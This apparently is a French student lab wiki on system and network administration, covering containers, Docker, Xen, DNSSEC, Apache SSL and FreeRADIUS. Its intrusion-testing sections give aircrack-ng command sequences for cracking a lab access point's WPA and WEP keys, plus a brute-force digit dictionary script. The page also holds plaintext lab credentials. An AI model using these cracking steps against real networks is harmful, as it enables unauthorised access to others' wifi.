Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===5.3 Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px|center]]<br />
<br />
===5.2 Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px|center]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px|center]]<br />
<br />
===6.2 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49135TP sysres IMA5sc 2018/2019 G72018-12-21T18:10:49Z<p>Mcreteur : /* 5.2 Cassage de clé WEP */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===4.2 Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves.<br />
<br />
<br />
===4.4 DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===4.3 Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
[[Fichier:Httpshercule.png|1000px|center]]<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===5.3 Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px|center]]<br />
<br />
===5.2 Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
